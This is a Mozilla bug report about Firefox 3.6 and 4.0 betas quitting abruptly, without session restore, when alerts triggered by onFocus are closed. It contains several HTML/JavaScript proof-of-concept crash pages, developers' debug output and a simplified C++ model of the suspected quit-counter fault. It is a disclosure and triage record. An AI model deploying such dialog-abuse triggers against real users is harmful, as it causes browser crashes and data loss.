Closed
Bug 640127
Opened 13 years ago
Closed 3 years ago
If I close An Alert Started By An onFocus Event, With The [x] button on Document Load, FireFox Closes/Crashes??
Categories
(Core :: DOM: Events, defect, P5)
RESOLVED
WORKSFORME
People
(Reporter: cjb.exploit, Unassigned)
Details
(Keywords: crash, dataloss, testcase, Whiteboard: [sg:dos] )
Attachments
(6 files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 If An Alert/Prompt/Confirm or Wrong Protocol Error-Alert Is Activated With An onFocus Event in the <BODY>. If The First Prompt Is Closed With The [x] button, Focus Taken Away From FireFox, Clicking {OK} or [x] On The Next Alert/Prompt/Confirm or Wrong Protocol Error-Alert. Causes FireFox To Close/Crash? Its Tabs And Windows With No Restore Options Available on Restart. Reproducible: Always Steps to Reproduce: I Have Managed To Repoduce This In The Below Script/POC's ------------------------Main-POC------------------------------ <body onFocus='JavaScript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) alert("Clicking [x] Primes The Crash?"); } };'><input type='hidden' id='counter' value='2'></body> ------------------------EOF-MainPOC--------------------------- --------------------------POC1-------------------------------- 1.open POC1 Follow Steps 1a. Click [x] 1b. Click {OK} or [x] <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body onFocus='JavaScript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) alert("Clicking [x] Primes The Crash? 
\n"+ "Attacker Could Use About 80+ \\n To Force [x]"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+ "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); } };'> <input type='hidden' id='counter' value='2'> </body> </html> --------------------------EOF-POC1---------------------------- ----------------------------POC2------------------------------ 2.open POC2 Follow Steps {This Effects 4.12b } 1a. Click [x] 1b. Click {OK} or [x] <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> </head> <body onFocus='javascript:{ cjb = new Number( document.getElementById( "counter" ).value ); document.getElementById( "counter" ).value = ( cjb - 1 ); { if ( cjb == 0 ) ; } { if ( cjb == 1 ) alert( "Click {ok} Or [x]" ); } { if ( cjb == 2 ) document.getElementById( "Target" ).src="FORCETHEPRESSOFXzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:"; } };'> <iframe id="Target" src='' name="Target" width="0" height="0"> </iframe> <input type='hidden' id='counter' value='2'> </body> </html> --------------------------EOF-POC2---------------------------- ----------------------------POC3------------------------------ 3.open POC3 Follow Steps {This Example Dosent Work For latest Beta But Could} 3a. Click ModdalDialog 3b. Click [x] 3c. Click {OK} or [x] 3d. 
Close Dialog <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title></title></head> <body> <center> <input type='button' value='Modal-Dialog' onClick='javascript:{ var Inject = document.getElementById("InjectString").value; var Header = document.getElementById("Modal_Header").value; window.showModalDialog( Header + Inject, "Arguments", "edge: Raised; "+ "center: No; "+ "status: No; "+ "resizable: No; "+ "dialogTop: 286px; "+ "dialogLeft: 998px; "+ "dialogWidth: 1214px; "+ "dialogHeight: 405px; ")}'> </center> <input id='Modal_Header' type='hidden' value="data:text/html;charset=utf-8,"> <input id='InjectString' type='hidden' value="<html><body onFocus='JavaScript:{cjb = new Number( document.getElementById( "counter" ).value );document.getElementById( "counter" ).value = ( cjb - 1 );{if ( cjb == 0 ) Create( "Error", "inErrorConsoleo" );}{if ( cjb == 1 ) alert( "Click {ok} Or [x]" );}{if ( cjb == 2 ) alert( "Clicking [x] Primes The Crash? \n"+"Attacker Could Use About 80+ \\n To Force [x]"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");}};'><input type=hidden id=counter value=2></body></html>"> </body> </html> --------------------------EOF-POC3---------------------------- This Snip Alerts A Message After Application Closes/Crashes ----------------------------POC4------------------------------ <body onFocus='JavaScript:{ x = new Number( document.getElementById( "counter" ).value ); if ( x == 0 ) CreateError( InErrorConsole ); else document.getElementById( "counter" ).value = ( x - 1 ); alert( "press [x] " + x + " more times" ); };' onLoad='JavaScript:{alert("Crash Or Close?")};'> <input type='hidden' id='counter' value='2'></body> --------------------------EOF-POC4---------------------------- Actual Results: FireFox Closed or Crashed With No Warnings Or Options To Restore Windows, Tabs And Data Expected Results: Not 
Crash/Close. Warnings. Restore Options. If Two Windows Are Open (errorconsole,bookmarks etc...) Closing The Second Window With [x] Causes The Close/Crash. If Sequence called in modaldialog On the Close Of The dialog window With [x] FireFox Closes/Crashes All Tabs/Windows depending On How Many Are open {POC3}. Tested With The Latest Beta release 4.12b, Didnt Work At First But An Alert Dialog Can Still Be Ativated with { Wrong Protocol Error-Alert {POC2} } So Also Effects The Latest Beta release note: Beta 4.12b Dose Have option To Restore On Home Page and Warns On Multi Tab close.
Comment 1•13 years ago
Please use the "Add an attachment" link on the bug report to upload your files. Thanks.
Reporter
Comment 2•13 years ago
Reporter
Comment 3•13 years ago
Reporter
Comment 4•13 years ago
Reporter
Comment 5•13 years ago
Reporter
Comment 6•13 years ago
Reporter
Comment 7•13 years ago
(In reply to comment #1)
> Please use the "Add an attachment" link on the bug report to upload
> your files. Thanks.

Example Files Uploaded :)
Reporter
Updated•13 years ago
Hardware: x86 → All
Updated•13 years ago
Attachment #518278 - Attachment mime type: text/plain → text/html
Updated•13 years ago
Attachment #518279 - Attachment is private: true
Attachment #518279 - Attachment mime type: text/plain → text/html
Updated•13 years ago
Attachment #518279 - Attachment is private: false
Updated•13 years ago
Attachment #518280 - Attachment mime type: text/plain → text/html
Updated•13 years ago
Attachment #518281 - Attachment mime type: text/plain → text/html
Updated•13 years ago
Attachment #518282 - Attachment mime type: text/plain → text/html
Comment 8•13 years ago
I do not see a problem on Mac. There's no 'x' button to close the modal dialogs, but "Esc" is supposed to do the equivalent.

On a windows machine I can reproduce the problem by clicking the built-in "x" close-window button, but not if I hit Esc to cancel the first dialog. Why would that be any different?

When it goes down it goes down fast -- no crash reporter comes up. Didn't have a newer windows debug build than 3.5.x handy, but in that version I get the following assertions before the crash:

Somewhat early
WARNING: requested removal of nonexistent window: nsWindowWatcher.cpp, line 1220

a few (4)
WARNING: getting z level of unregistered window: nsWindowMediator.cpp, line 635

Then
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413
ASSERTION: Uh, LeaveModalState() called w/o a reachable top window?: 'Error', nsGlobalWindow.cpp, line 4514
WARNING: NS_ENSURE_SUCCESS(rv, 0) failed with result 0x8000FFFF: nsContentUtils.cpp, line 2717
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413

Remember those line numbers are from a really old build.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 9•13 years ago
Kind of looks like we're shutting down on purpose, cleanly. After the assertions I see some of the usual shutdown assertions and the "--DOMWINDOW == XX" debug spew cleanly counting down as objects are freed
Comment 10•13 years ago
I don't see any problem in Firefox 3.6.15 on Linux. No problem in local (Linux x86-64) 1.9.2 debug build either.

In a local (Linux x86-64) mozilla-central debug build I saw a few
###!!! ASSERTION: Some mouse button down events are nested?: '!aDocument || !mMouseDownEventHandlingDocument', file dom/base/nsFocusManager.h, line 99
###!!! ASSERTION: mArguments wasn't cleaned up properly!: '!mArguments', file dom/base/nsGlobalWindow.cpp, line 993
but no problem other than that.

I will try on Win XP too...
Comment 11•13 years ago
(In reply to comment #8)
> Didn't have a newer windows debug build than 3.5.x handy [...]

Just to be clear, 3.5.x only applied to the debug version. I also reproduced on 3.6.16pre and (with POC-2) 4.0b12 on Windows.
Comment 12•13 years ago
I can reproduce the bug on Windows XP. Here's a stack with a breakpoint in nsGlobalWindow::Close() - it appears we have nested modal loops here. I suspect this is the root cause of the bug. The difference between Windows and other platforms could be focus handling. It doesn't look like a security issue though. I think the worst that could happen is data loss - losing your session, preferences, bookmarks etc.
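A simplified C++ model of the failure that the debug output in comments 8, 9 and 12 points toward: a per-window hold on a quit counter is released twice, so the application decides to quit cleanly while the browser window is still open. This is an added example, not Gecko source and not a confirmed root cause; only the name mConsiderQuitStopper comes from the quoted assertion, while the type names, the event order and the idempotent-close guard are assumptions.

```cpp
// Simplified model written for this page; it is not Gecko source. Only the
// counter name mConsiderQuitStopper comes from the assertion in comment 8.
#include <cstdio>

struct AppModel {
    int mConsiderQuitStopper = 0;  // one hold per open top-level window
    bool quitRequested = false;    // set when the last hold is released
    int outOfBounds = 0;           // times the comment 8 assertion would fire

    void EnterSurvivalArea() { ++mConsiderQuitStopper; }
    void ExitSurvivalArea() {
        if (mConsiderQuitStopper <= 0) { ++outOfBounds; return; }
        if (--mConsiderQuitStopper == 0) quitRequested = true;
    }
};

struct Window {
    AppModel& app;
    bool guardClose;        // hardened variant: releasing the hold is idempotent
    bool released = false;
    Window(AppModel& a, bool guard) : app(a), guardClose(guard) { app.EnterSurvivalArea(); }
    void Close() {
        if (guardClose && released) return;  // second Close() is a no-op
        released = true;
        app.ExitSurvivalArea();
    }
};

// Assumed event order: the browser window stays open while two nested alert
// dialogs are each closed twice (once by the user, once when a modal loop unwinds).
AppModel RunScenario(bool guardClose) {
    AppModel app;
    Window browser(app, guardClose);
    Window firstAlert(app, guardClose);
    Window secondAlert(app, guardClose);
    firstAlert.Close();   // [x] on the first alert
    secondAlert.Close();  // OK or [x] on the nested alert
    secondAlert.Close();  // duplicate close as the inner loop unwinds
    firstAlert.Close();   // duplicate close as the outer loop unwinds
    return app;
}

int main() {
    AppModel bad = RunScenario(false), good = RunScenario(true);
    std::printf("unguarded: quit=%d out-of-bounds=%d\n", bad.quitRequested, bad.outOfBounds);
    std::printf("guarded:   quit=%d out-of-bounds=%d\n", good.quitRequested, good.outOfBounds);
    return 0;
}
```

In the unguarded run the counter reaches zero with the browser window never closed, which matches a clean shutdown with no crash reporter; the guarded run leaves one hold in place.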
Updated•12 years ago
Group: core-security
Comment 13•6 years ago
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and have no one currently assigned to P5.

If you have questions, please contact :mdaly.
Priority: -- → P5
Comment 14•3 years ago
Closing this issue as Resolved > Worksforme since none of the attached files (after following the given steps) crash any of the latest versions of Firefox Nightly, beta or release on Windows 10.
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → WORKSFORME